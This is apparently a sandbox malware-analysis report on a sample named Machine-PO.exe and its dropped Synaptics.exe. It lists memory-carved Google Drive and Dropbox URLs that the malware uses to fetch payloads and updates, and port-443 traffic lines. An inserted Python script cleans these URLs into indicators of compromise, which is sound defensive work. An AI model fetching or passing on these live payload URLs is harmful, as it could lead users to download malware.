Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoject
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorigi
Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp.k3/
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps.cn
Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpw
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsm71(
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-w2
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadti
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtogra
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtp
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu6
Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduD
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduG
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadubleEj.1k
Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvt2-c
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1841430179.000000000C1FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1845182941.000000000EDBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1842203218.000000000CD3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxyt2
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyB
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~G
Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/7
Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD?10
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDsZP
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDsZP$
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDsZPf
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDsZPj
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDsZPs
Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco.uk
Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf5
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnNg
Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv?c0
Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw3G
Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlP
Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
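The rows above are strings carved from process memory, which is why one download URL appears dozens of times with different trailing bytes: the carver keeps reading until it hits a non-printable byte, so whatever sat next to the URL on the heap is glued onto it. The following script is an added example (not Joe Sandbox code) that reduces such rows to clean indicators. It rests on one stated assumption: for these hosts the final query parameter has a fixed value (`export=download` for Google Drive, `dl=0`/`dl=1` for Dropbox share links), so a carved value that starts with the fixed value is truncated to it and one that does not (`export=downloX`, `?dl=`, `?dlP`) is a truncated carve and is rejected rather than guessed. It also pivots each URL to its atomic indicator, because `docs.google.com/uc?id=` and `drive.usercontent.google.com/download?id=` fetch the same file ID, and a Dropbox share key survives renaming the file. The sample rows are copied from this report; the parser accepts them with or without the `|` column separator.

```python
"""Turn memory-carved download URLs from a sandbox report into clean IOCs.

Added example, not Joe Sandbox code. KNOWN_TAIL_VALUES encodes the assumption
that the last query parameter of these services has a fixed value, so anything
carved after it is memory junk.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: rows copied from the report, two report columns joined by " | ".
SAMPLE_ROWS = [
    "Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm",
    "Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmB",
    "Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads",
    "Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~G",
    "Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX",
    "Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download",
    "Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download",
    "Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=",
    "Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1",
    "Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16",
    "Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlP",
    "Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1",
    "Source: Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:",
]

# Assumed fixed values per (host, last parameter). A carved value that starts
# with one of them is truncated to it; one that does not is rejected.
KNOWN_TAIL_VALUES = {
    ("docs.google.com", "export"): ("download",),
    ("drive.usercontent.google.com", "export"): ("download",),
    ("www.dropbox.com", "dl"): ("0", "1"),
}

URL_RE = re.compile(r"String found in binary or memory:\s*(?P<url>\S+)")


def parse_row(row):
    """Return (set of source processes, carved URL), or None for non-URL rows."""
    m = URL_RE.search(row)
    if not m:
        return None
    procs = set(re.findall(r"(\S+\.exe),", row[: m.start()]))
    return procs, m.group("url")


def pivot_for(parts, params):
    """Atomic indicator behind the URL: Drive file ID or Dropbox share key."""
    q = dict(params)
    if parts.netloc.endswith("google.com") and "id" in q:
        return ("gdrive_file_id", q["id"])
    m = re.match(r"^/s/([^/]+)/", parts.path)
    if parts.netloc == "www.dropbox.com" and m:
        return ("dropbox_share_key", m.group(1))
    return ("url", f"{parts.scheme}://{parts.netloc}{parts.path}")


def canonicalise(url):
    """Strip memory junk from the final query value.

    Returns (canonical_url, pivot), or None when the host is not in the table
    or the carve is truncated (e.g. '?dl=' or 'export=downlo')."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    if not params:
        return None
    key, val = params[-1]
    allowed = KNOWN_TAIL_VALUES.get((parts.netloc, key))
    if allowed is None:
        return None
    fixed = next((a for a in allowed if val.startswith(a)), None)
    if fixed is None:
        return None
    query = "&".join(f"{k}={v}" for k, v in params[:-1] + [(key, fixed)])
    return f"{parts.scheme}://{parts.netloc}{parts.path}?{query}", pivot_for(parts, params)


def extract_iocs(rows):
    """Return (canonical URL -> processes, pivot -> canonical URLs, rejected carves)."""
    by_url, by_pivot, rejected = defaultdict(set), defaultdict(set), []
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        procs, url = parsed
        result = canonicalise(url)
        if result is None:
            rejected.append(url)
            continue
        canon, pivot = result
        by_url[canon] |= procs
        by_pivot[pivot].add(canon)
    return dict(by_url), dict(by_pivot), rejected


if __name__ == "__main__":
    urls, pivots, bad = extract_iocs(SAMPLE_ROWS)
    for canon, procs in sorted(urls.items()):
        print(f"{canon}  <- {', '.join(sorted(procs))}")
    for (kind, value), canons in sorted(pivots.items()):
        print(f"{kind}={value}: {len(canons)} URL form(s)")
    print(f"{len(bad)} carves rejected as truncated")
```

On the sample rows this yields six canonical URLs and five pivots; the two Google hosts collapse onto the single file ID `0BxsMXGfPIZfSVlVsOGlEVGxuZVk`, which is the value worth hunting for, since the attacker can switch between `docs.google.com/uc` and `drive.usercontent.google.com/download` without changing it. The three truncated carves are reported separately instead of being silently merged, because a truncated string is evidence that a URL was present but is not itself a usable indicator.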
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
